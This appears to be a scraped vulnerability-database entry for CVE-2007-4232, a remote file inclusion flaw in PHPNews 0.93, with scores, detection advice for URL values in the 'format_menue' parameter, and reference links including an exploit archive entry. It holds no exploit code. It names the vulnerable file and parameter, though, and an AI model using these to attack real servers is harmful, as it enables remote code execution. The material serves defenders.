CVE-2007-4232
published 2007-08-08CVE-2007-4232: PHP remote file inclusion vulnerability in admin/inc/change_action.php in Andreas Robertz PHPNews 0.93 allows remote attackers to execute arbitrary PHP code…
PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
51.65%
98.8th percentile
PHP remote file inclusion vulnerability in admin/inc/change_action.php in Andreas Robertz PHPNews 0.93 allows remote attackers to execute arbitrary PHP code via a URL in the format_menue parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| andreas_robertz | phpnews | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting admin/inc/change_action.php with a URL-like value in the 'format_menue' GET parameter, which indicates a Remote File Inclusion (RFI) attempt against PHPNews 0.93. ↗
- →Alert on any inbound GET request where the 'format_menue' parameter value begins with 'http://' or 'https://', as this is the direct exploitation vector for arbitrary PHP code execution. ↗
- ·The vulnerability is only exploitable if PHP's 'allow_url_include' (or 'allow_url_fopen' in older PHP versions) is enabled on the server, as the attack relies on remote file inclusion via a user-supplied URL. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://www.securityfocus.com/bid/25223http://www.vupen.com/english/advisories/2007/2810https://exchange.xforce.ibmcloud.com/vulnerabilities/35835https://www.exploit-db.com/exploits/4268http://www.securityfocus.com/bid/25223http://www.vupen.com/english/advisories/2007/2810https://exchange.xforce.ibmcloud.com/vulnerabilities/35835https://www.exploit-db.com/exploits/4268
2007-08-08
Published